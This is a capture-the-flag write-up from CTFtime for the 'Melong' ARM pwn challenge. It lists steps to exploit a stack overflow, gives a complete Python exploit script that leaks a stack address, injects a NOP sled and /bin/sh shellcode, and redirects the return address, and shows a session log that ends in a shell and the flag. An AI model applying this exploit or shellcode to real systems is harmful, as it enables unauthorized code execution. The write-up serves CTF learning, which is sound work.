CTFtime.org

Melong

by 8710xiq / PwnaSonic

Rating: 5.0

## === Melong (Pwn: 26 solves / 50 pts) ===

1. ARM binary.
2. The length of the personal training changes the length that can be written to the stack.
3. Stack address can be leaked from the stack.
4. Because the leaked address differs depending on the environment, write the NOP-code(\x00\x00\xa0\xe1)at the head of the shellcode.
5. Change the return address after 84 bytes and start the shellcode on the stack.
6. The following exploit code takes about 2 minutes as a whole.
7. The minipwn.py is downloaded from the following URL.
https://github.com/inaz2/minipwn/blob/master/minipwn.py

```
from minipwn import *

#s = connect_process("./melong")
s = socket.create_connection(('ch41l3ng3s.codegate.kr', 1199))

shellcode = '\x01\x70\x8f\xe2\x17\xff\x2f\xe1\x04\xa7\x03\xcf\x52\x40\x07\xb4\x68\x46\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x2f\x73\x68'

def Check():
print "Check()"
recvuntil(s, "Type the number:")
sendline(s, "1")
recvuntil(s, "Your height(meters) : ")
sendline(s, "1.65")
recvuntil(s, "Your weight(kilograms) : ")
sendline(s, "100")

def Exercise():
print "Exercise()"
recvuntil(s, "Type the number:")
sendline(s, "2")

def Register(time):
print "Register()", time
recvuntil(s, "Type the number:")
sendline(s, "3")
recvuntil(s, "How long do you want to take personal training?\n")
sendline(s, str(time))

def Write(buf):
print "Write()", buf
recvuntil(s, "Type the number:")
sendline(s, "4")
sendline(s, buf)

def Out():
print "Out()"
recvuntil(s, "Type the number:")
sendline(s, "6")

Check()
Check()
Exercise()
Register(32)

print "Wait 32 seconds !!!!!!!!!"
Write("1"*32)
r = s.recv(10+32+4)
print r
stack_leak_addr = u32(r[42:46])
stack_buf_addr = stack_leak_addr - 0x40
print "stack_leak_addr = ", hex(stack_leak_addr)
print "stack_buf_addr = ", hex(stack_buf_addr)

Register(88)
Register(88)

buf = "\x00\x00\xa0\xe1" * 10 + shellcode + '\x00'
buf = buf.ljust(84, '2')
buf += p32(stack_buf_addr)
print "Wait 88 seconds !!!!!!!!!!!!!!!!!"
Write(buf)

Out()

interact(s)
```

```
hoge@ubuntu:~/Pwn_Melong$ python exploit.py
Check()
Check()
Exercise()
Register() 32
Wait 32 seconds !!!!!!!!!
Write() 11111111111111111111111111111111
you wrote 11111111111111111111111111111111���
stack_leak_addr = 0xf6fffca8
stack_buf_addr = 0xf6fffc68
Register() 88
Register() 88
Wait 88 seconds !!!!!!!!!!!!!!!!!
Write() ��������������������?p?�/�?�?�R@�hF�iF
'?��F/bin//sh2222222h��
Out()
See you again :)
id
uid=1000(melong) gid=1000(melong) groups=1000(melong)
ls
flag
cat flag
FLAG{D0n7_7h1nk_7ha7_1_Can_3xp1ain_it}
```

Comments